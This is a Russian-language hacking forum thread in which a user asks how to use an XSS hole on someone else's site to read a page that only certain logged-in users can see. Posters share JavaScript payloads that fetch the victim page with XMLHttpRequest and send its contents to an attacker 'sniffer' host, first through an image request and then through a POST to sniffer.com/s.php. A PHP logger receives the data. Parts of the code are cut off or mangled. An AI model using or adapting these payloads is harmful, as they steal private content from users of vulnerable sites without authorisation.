PDA

Просмотр полной версии : XSS , скачать документ, или страницу.


sergei_petrovish
20.04.2016, 11:53
Есть сайт с xss , и там есть страница с интересным мне контентом. Она видна только конкретным пользователям. Подскажите как можно эту страницу увидеть "глазами пользователя" или скачать. Куки достать там не получится , они с флагом. Адрес страницы такого типа site.com/wow.php . На форуме находил варианты скриптов , но они не работают Этот скрипт должен отправить весь ответ , но не срабатывает.


varxhr= newXMLHttpRequest();
xhr.open('GET','//site/phpinfo.php',true);
xhr.send(null);
xhr.onreadystatechange= function() {
if (xhr.readyState==4) {
if(xhr.status==200) {
(newImage()).src="//%сниффер%/?"+xhr.responseText
}
}
}



ДУмал что проблемма в снифере , но перепробовав огромное количество , поучаю тот же результат .Пару раз получил обрезанный сильно ответ . Может нужно по особенному настроить снифер ?.

crlf
21.04.2016, 21:51
Попробуй escape(btoa(xhr.responseText))

crlf
21.04.2016, 23:01
Файл может не влезть в GET запрос по причине 414-ой ошибки. Вот что надумал:




varxhr= newXMLHttpRequest();
xhr.open('GET','http://victim.com/phpinfo.php',true);
xhr.send(null);
xhr.onreadystatechange= function() {
if (xhr.readyState==4) {
if(xhr.status==200) {
varfhr= newXMLHttpRequest() ;
fhr.open('POST','http://sniffer.com/s.php',true);
fhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
fhr.withCredentials=true;
varbody='file='+escape(xhr.r esponseText);
varaBody= newUint8Array(bod y.length);
for (vari=0;i



s.php:


",FILE_APPEND);
?>